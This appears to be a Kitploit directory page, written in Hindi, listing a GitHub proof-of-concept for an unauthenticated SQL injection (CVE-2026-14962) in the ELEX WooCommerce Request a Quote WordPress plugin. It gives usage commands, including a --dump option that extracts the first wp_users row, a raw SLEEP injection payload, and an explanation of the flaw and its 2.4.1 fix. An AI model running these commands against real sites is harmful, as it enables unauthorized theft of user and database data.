Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-14962 — Wordpress Plugin ELEX WooCommerce Request a Quote अनधिकृत SQL इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/cflowsec/cve-2026-14962
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubcflowsec/cve-2026-14962

CVE-2026-14962

Wordpress Plugin ELEX WooCommerce Request a Quote अनधिकृत SQL इंजेक्शन

रिपॉजिटरी देखें
9घं 57मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-14962

Wordpress Plugin ELEX WooCommerce Request a Quote अनधिकृत SQL इंजेक्शन

ELEX WooCommerce Request a Quote (WordPress plugin elex-request-a-quote) ≤ 2.4.0 — सार्वजनिक elex_raq_add_to_quote AJAX action के माध्यम से अनधिकृत SQL इंजेक्शन।

केवल अधिकृत परीक्षण के लिए। इसे उन सिस्टमों के विरुद्ध न चलाएँ जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति आपके पास नहीं है।

आवश्यक: Python 3, केवल मानक लाइब्रेरी। लक्ष्य पर WooCommerce चल रहा होना चाहिए (quote scripts/nonce shop/home पृष्ठ पर प्रिंट होते हैं)।

root@kitploit:~
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u https://TARGET --test --insecure
python3 cve-2026-14962-elex-raq-sqli.py -u TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump --pid 11
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sleep 3
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sql 'OR JSON_ARRAY(SLEEP(3)))#'
Flagयह क्या करता है
-u / --urlWordPress साइट रूट (आवश्यक)। http:// या https://; होस्टनेम को पहले HTTPS के रूप में आज़माया जाता है, फिर HTTP। Self-signed TLS स्वतः पुनः प्रयास किया जाता है। --insecure शुरू से ही verify छोड़ देता है
--testGuest: plugin संस्करण + सार्वजनिक nonce, फिर एक गैर-विनाशकारी $0 SQL प्रोब
--dumpपहली wp_users पंक्ति + DB user। WP_DEBUG आवश्यक है ताकि XPATH त्रुटि HTTP body में हो
--query SQLआपका स्वयं का SQL expression (single quotes नहीं; strings के लिए 0x… hex का उपयोग करें)
--sql EXPR$0$0 breakout के बाद कच्चा data[id] (आप ) OR … # gadget लिखते हैं)
--sleep Nसमय-आधारित SLEEP(N) प्रयास
--pid / --vidWooCommerce product / variation ids (sink तक पहुँचने के लिए variation रिक्त नहीं होना चाहिए)
--insecureTLS verify छोड़ें
--timeoutHTTP timeout सेकंड (डिफ़ॉल्ट 30)

अनधिकृत। nonce / और /shop/ पर request_a_quote_ajax_obj में प्रिंट होता है। guest cookie request_a_quote_user_coockie है (plugin की वर्तनी)।

--test attribute_value=$0 POST करता है। Vulnerable 2.4.0 preg_replace $0 को %s मैच मानता है और query में एक literal %d छोड़ देता है। 2.4.1 JSON_CONTAINS को bind करता है और $0 केवल एक JSON मान होता है।

Stdout: VERSION, NONCE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, NO_NONCE, NO_DUMP, SQLERR, SLEEP।

CVE: CVE-2026-14962। Plugin changelog 2.4.1।

Working PoC

टूल डाउनलोड करें